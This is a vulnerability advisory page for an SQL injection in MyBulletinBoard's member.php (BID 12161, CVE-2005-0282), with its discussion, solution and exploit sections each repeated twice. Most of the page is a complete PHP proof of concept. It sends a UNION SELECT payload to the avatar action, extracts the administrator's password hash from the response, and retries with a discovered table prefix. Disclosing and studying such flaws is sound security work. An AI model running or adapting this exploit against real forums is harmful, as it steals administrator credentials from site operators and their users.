MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
BID:12161
Info
MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
| Bugtraq ID: | 12161 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0282 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 04 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery is credited to <[email protected]>. |
| Vulnerable: |
MyBulletinBoard MyBulletinBoard RC4 |
| Not Vulnerable: | |
Discussion
MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
A remote SQL injection vulnerability reportedly affects MyBulletinBoard. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query.
An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information. Reportedly, a successful attack can disclose the administrator password hash to an attacker.
All versions of MyBulletinBoard are considered vulnerable to this issue.
A remote SQL injection vulnerability reportedly affects MyBulletinBoard. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query.
An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information. Reportedly, a successful attack can disclose the administrator password hash to an attacker.
All versions of MyBulletinBoard are considered vulnerable to this issue.
Exploit / POC
MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
An exploit is not required.
The following proof of concept is reported to disclose the administrator password hash to a remote attacker:
<?php
// the example below will attack http://www.example.com/mybb/
echo 'Pass:' . get_pass('www.example.com', '/mybb', '');
function get_pass($host, $path, $dbprefix) {
$query[] = 'uid=' . urlencode ("1' UNION SELECT 10000, 200, password AS type FROM {$dbprefix}users WHERE uid=1 ORDER BY uid DESC/*");
$query = implode('&', $query);
$header = "POST $path/member.php?action=avatar HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: " . strlen($query) . "\r\n\r\n";
$fp = fsockopen($host, 80, $errno, $errstr, 30);
fwrite($fp, $header . $query);
$allah = '';
while (!feof($fp)) {
$tmp = fgets($fp, 1024);
$allah .= $tmp;
}
fclose($fp);
preg_match('/\: ([a-z0-9]{32})/i', $allah, $matches);
if (empty($matches[1]) && empty($dbprefix)) {
preg_match('#FROM (\w+)avatars WHERE#i', $allah, $matches);
$dbprefix = $matches[1];
if (empty($dbprefix)) {
return 'Unable to obtain password';
}
$password = get_pass($host, $path, $dbprefix);
}
else {
$password = $matches[1];
}
return $password;
}
?>
An exploit is not required.
The following proof of concept is reported to disclose the administrator password hash to a remote attacker:
<?php
// the example below will attack http://www.example.com/mybb/
echo 'Pass:' . get_pass('www.example.com', '/mybb', '');
function get_pass($host, $path, $dbprefix) {
$query[] = 'uid=' . urlencode ("1' UNION SELECT 10000, 200, password AS type FROM {$dbprefix}users WHERE uid=1 ORDER BY uid DESC/*");
$query = implode('&', $query);
$header = "POST $path/member.php?action=avatar HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: " . strlen($query) . "\r\n\r\n";
$fp = fsockopen($host, 80, $errno, $errstr, 30);
fwrite($fp, $header . $query);
$allah = '';
while (!feof($fp)) {
$tmp = fgets($fp, 1024);
$allah .= $tmp;
}
fclose($fp);
preg_match('/\: ([a-z0-9]{32})/i', $allah, $matches);
if (empty($matches[1]) && empty($dbprefix)) {
preg_match('#FROM (\w+)avatars WHERE#i', $allah, $matches);
$dbprefix = $matches[1];
if (empty($dbprefix)) {
return 'Unable to obtain password';
}
$password = get_pass($host, $path, $dbprefix);
}
else {
$password = $matches[1];
}
return $password;
}
?>
Solution / Fix
MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
References:
References:
- MyBulletinBoard Home Page (MyBulletinBoard)
- MyBB SQL Injection (
)